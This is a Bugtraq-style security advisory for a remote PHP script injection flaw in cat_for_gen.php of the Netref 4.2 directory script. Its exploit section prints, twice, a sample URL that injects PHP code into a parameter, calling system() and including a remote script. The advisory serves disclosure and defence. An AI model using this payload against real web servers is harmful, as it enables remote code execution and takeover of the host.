Netref Cat_for_gen.PHP Remote PHP Script Injection Vulnerability
BID:13275
Info
Netref Cat_for_gen.PHP Remote PHP Script Injection Vulnerability
| Bugtraq ID: | 13275 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 20 2005 12:00AM |
| Updated: | Apr 20 2005 12:00AM |
| Credit: | jaguar <[email protected]> is credited with the discovery of this issue. |
| Vulnerable: |
Netref Netref 4.2 |
| Not Vulnerable: | |
Discussion
Netref Cat_for_gen.PHP Remote PHP Script Injection Vulnerability
A remote PHP script injection vulnerability affects Netref. This issue is due to a failure of the application to sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary PHP script code in the context of an affected Web server. This will facilitate a compromise of the host computer.
A remote PHP script injection vulnerability affects Netref. This issue is due to a failure of the application to sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary PHP script code in the context of an affected Web server. This will facilitate a compromise of the host computer.
Exploit / POC
Netref Cat_for_gen.PHP Remote PHP Script Injection Vulnerability
No exploit is required to leverage this issue. The following example is available:
http://www.yourdomain.com/[netref_folder]/script/cat_for_gen.php?ad=1&ad_direct=../&m_for_racine=</option></SELECT><?php system($command);include($remote_script)?>
No exploit is required to leverage this issue. The following example is available:
http://www.yourdomain.com/[netref_folder]/script/cat_for_gen.php?ad=1&ad_direct=../&m_for_racine=</option></SELECT><?php system($command);include($remote_script)?>
Solution / Fix
Netref Cat_for_gen.PHP Remote PHP Script Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
Netref Cat_for_gen.PHP Remote PHP Script Injection Vulnerability
References:
References:
- Netref Homepage (Netref)
- Annuaire Netref v4.2 [ fwrite php ] vulnerability (jaguar